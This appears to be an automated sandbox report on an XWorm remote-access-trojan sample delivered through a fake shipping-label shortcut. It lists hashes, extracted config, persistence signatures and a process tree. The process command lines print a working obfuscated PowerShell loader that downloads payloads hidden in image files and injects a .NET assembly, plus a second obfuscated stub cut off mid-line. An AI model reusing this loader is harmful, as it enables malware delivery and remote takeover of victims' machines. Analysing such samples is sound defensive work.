Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
136s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
05/04/2024, 11:45
Static task
static1
Behavioral task
behavioral1
Sample
logo/receipt.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
logo/receipt.vbs
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
parcel_shipping_label.lnk
Resource
win7-20240215-en
Behavioral task
behavioral4
Sample
parcel_shipping_label.lnk
Resource
win10v2004-20231215-en
General
-
Target
parcel_shipping_label.lnk
-
Size
1002B
-
MD5
a0abe64514f25b2564718dadc6f077c9
-
SHA1
aa6b93ee0817e74d66d8fbcb475442d7071c1b6f
-
SHA256
82ba6734f458e88dc2465ff8152fb0de8a33e08163da64c9653d8c89f9dae8c2
-
SHA512
ff504e33e1dbd8af157e6c1fb3fdfc0d8fe735e1f347cd90f9cc15ec04151b06078e1d926b9fd25e817d2417185ad1972d759f113d96c2c3595d2ec88cfc4402
Malware Config
Extracted
xworm
5.0
UxOlPOZZNwNV9srk
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/Dh8E7H3R
Extracted
xworm
3.1
-
Install_directory
%AppData%
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/Dh8E7H3R
Signatures
-
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral4/memory/4932-36-0x0000000000400000-0x0000000000410000-memory.dmp family_xworm behavioral4/memory/788-86-0x0000000007EC0000-0x0000000007ED6000-memory.dmp family_xworm behavioral4/memory/4108-88-0x0000000005180000-0x0000000005190000-memory.dmp family_xworm -
Blocklisted process makes network request 5 IoCs
flow pid Process 6 2816 WScript.exe 9 2816 WScript.exe 11 2816 WScript.exe 24 2624 powershell.exe 29 2624 powershell.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation tqnyya.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation tqnyya.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation tqnyya.bat.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tqnyya.lnk tqnyya.bat.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tqnyya.lnk tqnyya.bat.exe -
Executes dropped EXE 3 IoCs
pid Process 788 tqnyya.bat.exe 1972 tqnyya.bat.exe 4652 tqnyya.bat.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tqnyya = "C:\\Users\\Admin\\AppData\\Roaming\\tqnyya.bat" tqnyya.bat.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 33 pastebin.com 34 pastebin.com 46 pastebin.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2624 set thread context of 4932 2624 powershell.exe 92 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3168 schtasks.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 64 powershell.exe 64 powershell.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 4932 AddInProcess32.exe 788 tqnyya.bat.exe 788 tqnyya.bat.exe 4108 powershell.exe 4108 powershell.exe 4108 powershell.exe 4108 powershell.exe 788 tqnyya.bat.exe 1972 tqnyya.bat.exe 1972 tqnyya.bat.exe 2640 powershell.exe 2640 powershell.exe 2640 powershell.exe 2640 powershell.exe 2640 powershell.exe 4652 tqnyya.bat.exe 4652 tqnyya.bat.exe 752 powershell.exe 752 powershell.exe 752 powershell.exe 752 powershell.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 64 powershell.exe Token: SeDebugPrivilege 2624 powershell.exe Token: SeDebugPrivilege 4932 AddInProcess32.exe Token: SeDebugPrivilege 788 tqnyya.bat.exe Token: SeDebugPrivilege 4108 powershell.exe Token: SeDebugPrivilege 1972 tqnyya.bat.exe Token: SeDebugPrivilege 2640 powershell.exe Token: SeDebugPrivilege 4652 tqnyya.bat.exe Token: SeDebugPrivilege 752 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4932 AddInProcess32.exe 788 tqnyya.bat.exe -
Suspicious use of WriteProcessMemory 47 IoCs
description pid Process procid_target PID 3236 wrote to memory of 2816 3236 cmd.exe 86 PID 3236 wrote to memory of 2816 3236 cmd.exe 86 PID 2816 wrote to memory of 64 2816 WScript.exe 87 PID 2816 wrote to memory of 64 2816 WScript.exe 87 PID 64 wrote to memory of 2624 64 powershell.exe 89 PID 64 wrote to memory of 2624 64 powershell.exe 89 PID 2624 wrote to memory of 4712 2624 powershell.exe 90 PID 2624 wrote to memory of 4712 2624 powershell.exe 90 PID 2624 wrote to memory of 4712 2624 powershell.exe 90 PID 2624 wrote to memory of 4276 2624 powershell.exe 91 PID 2624 wrote to memory of 4276 2624 powershell.exe 91 PID 2624 wrote to memory of 4276 2624 powershell.exe 91 PID 2624 wrote to memory of 4932 2624 powershell.exe 92 PID 2624 wrote to memory of 4932 2624 powershell.exe 92 PID 2624 wrote to memory of 4932 2624 powershell.exe 92 PID 2624 wrote to memory of 4932 2624 powershell.exe 92 PID 2624 wrote to memory of 4932 2624 powershell.exe 92 PID 2624 wrote to memory of 4932 2624 powershell.exe 92 PID 2624 wrote to memory of 4932 2624 powershell.exe 92 PID 2624 wrote to memory of 4932 2624 powershell.exe 92 PID 4932 wrote to memory of 2388 4932 AddInProcess32.exe 98 PID 4932 wrote to memory of 2388 4932 AddInProcess32.exe 98 PID 4932 wrote to memory of 2388 4932 AddInProcess32.exe 98 PID 2388 wrote to memory of 3544 2388 cmd.exe 100 PID 2388 wrote to memory of 3544 2388 cmd.exe 100 PID 2388 wrote to memory of 3544 2388 cmd.exe 100 PID 3544 wrote to memory of 788 3544 cmd.exe 102 PID 3544 wrote to memory of 788 3544 cmd.exe 102 PID 3544 wrote to memory of 788 3544 cmd.exe 102 PID 788 wrote to memory of 4108 788 tqnyya.bat.exe 105 PID 788 wrote to memory of 4108 788 tqnyya.bat.exe 105 PID 788 wrote to memory of 4108 788 tqnyya.bat.exe 105 PID 788 wrote to memory of 3168 788 tqnyya.bat.exe 107 PID 788 wrote to memory of 3168 788 tqnyya.bat.exe 107 PID 788 wrote to memory of 3168 788 tqnyya.bat.exe 107 PID 3300 wrote to memory of 4852 3300 cmd.exe 112 PID 3300 wrote to memory of 4852 3300 cmd.exe 112 PID 4852 wrote to memory of 1972 4852 cmd.exe 114 PID 4852 wrote to memory of 1972 4852 cmd.exe 114 PID 1972 wrote to memory of 2640 1972 tqnyya.bat.exe 115 PID 1972 wrote to memory of 2640 1972 tqnyya.bat.exe 115 PID 1320 wrote to memory of 1340 1320 cmd.exe 119 PID 1320 wrote to memory of 1340 1320 cmd.exe 119 PID 1340 wrote to memory of 4652 1340 cmd.exe 121 PID 1340 wrote to memory of 4652 1340 cmd.exe 121 PID 4652 wrote to memory of 752 4652 tqnyya.bat.exe 122 PID 4652 wrote to memory of 752 4652 tqnyya.bat.exe 122
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\parcel_shipping_label.lnk1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\logo\receipt.vbs"2⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre2DgTreDDgTreDgTreLwDgTrewDgTreDQDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre4DgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwDgTremDgTreGUDgTreODgTreDgTreyDgTreDEDgTreYwBmDgTreDcDgTreNgBkDgTreGUDgTreYgBiDgTreDUDgTreYQDgTrezDgTreDYDgTreNwBiDgTreDQDgTreZDgTreDgTrewDgTreGMDgTreMQDgTrexDgTreGYDgTreNwDgTrewDgTreDIDgTreMDgTreDgTre4DgTreGIDgTreZgBjDgTreDYDgTreYwBiDgTreDQDgTreNDgTreDgTre5DgTreDYDgTreZQDgTre0DgTreDEDgTreODgTreBmDgTreDIDgTreYQDgTre4DgTreDcDgTreZDgTreDgTrezDgTreDMDgTreNDgTreDgTre3DgTreGMDgTreNgDgTre0DgTreDIDgTreNDgTreDgTre3DgTreDDgTreDgTreZQDgTre5DgTreGQDgTrePQBtDgTreGgDgTreJgDgTrewDgTreGUDgTreZDgTreDgTre0DgTreGMDgTreMDgTreDgTre2DgTreDYDgTrePQBzDgTreGkDgTreJgDgTrewDgTreGUDgTreMgBjDgTreGUDgTreMQDgTre2DgTreDYDgTrePQB4DgTreGUDgTrePwB0DgTreHgDgTredDgTreDgTreuDgTreGQDgTrebwBvDgTreGgDgTreLwDgTre4DgTreDcDgTreMDgTreDgTrewDgTreDkDgTreNDgTreDgTrezDgTreDYDgTreMgDgTrezDgTreDDgTreDgTreMQDgTre3DgTreDgDgTreNwDgTre0DgTreDIDgTreMgDgTrexDgTreC8DgTreOQDgTrezDgTreDgDgTreMwDgTrewDgTreDDgTreDgTreNQDgTre2DgTreDUDgTreNwDgTre5DgTreDIDgTreODgTreDgTrewDgTreDYDgTreMQDgTre4DgTreDEDgTreMQDgTrevDgTreHMDgTredDgTreBuDgTreGUDgTrebQBoDgTreGMDgTreYQB0DgTreHQDgTreYQDgTrevDgTreG0DgTrebwBjDgTreC4DgTrecDgTreBwDgTreGEDgTreZDgTreByDgTreG8DgTreYwBzDgTreGkDgTreZDgTreDgTreuDgTreG4DgTreZDgTreBjDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&e821cf76debb5a367b4d0c11f70208bfc6cb4496e418f2a87d3347c642470e9d=mh&0ed4c066=si&0e2ce166=xe?txt.dooh/8700943623017874221/9383005657928061811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"4⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"5⤵PID:4712
-
-
C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"5⤵PID:4276
-
-
C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tqnyya.bat" "6⤵
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\tqnyya.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Users\Admin\AppData\Local\Temp\tqnyya.bat.exe"C:\Users\Admin\AppData\Local\Temp\tqnyya.bat.exe" -w hidden -c $ZiYB='TWHQYraWHQYnsWHQYfoWHQYrmFiWHQYnalWHQYBloWHQYckWHQY'.Replace('WHQY', '');$TWWf='CreWHQYateWHQYDeWHQYcryWHQYptWHQYorWHQY'.Replace('WHQY', '');$JFEq='LoWHQYadWHQY'.Replace('WHQY', '');$PgsW='GetWHQYCuWHQYrWHQYreWHQYntWHQYPrWHQYoWHQYceWHQYssWHQY'.Replace('WHQY', '');$tNsL='LaWHQYstWHQY'.Replace('WHQY', '');$GjzR='MaiWHQYnWHQYModuWHQYleWHQY'.Replace('WHQY', '');$aRAn='SpWHQYlitWHQY'.Replace('WHQY', '');$TNHv='IWHQYnWHQYvokWHQYeWHQY'.Replace('WHQY', '');$QZWA='EntWHQYrWHQYyPoWHQYintWHQY'.Replace('WHQY', '');$vNAk='FroWHQYmBaWHQYsWHQYe6WHQY4SWHQYtriWHQYngWHQY'.Replace('WHQY', '');$UYdq='ReWHQYaWHQYdLiWHQYnWHQYeWHQYsWHQY'.Replace('WHQY', '');$JZFz='ChWHQYangWHQYeWHQYExtWHQYensiWHQYoWHQYnWHQY'.Replace('WHQY', '');function 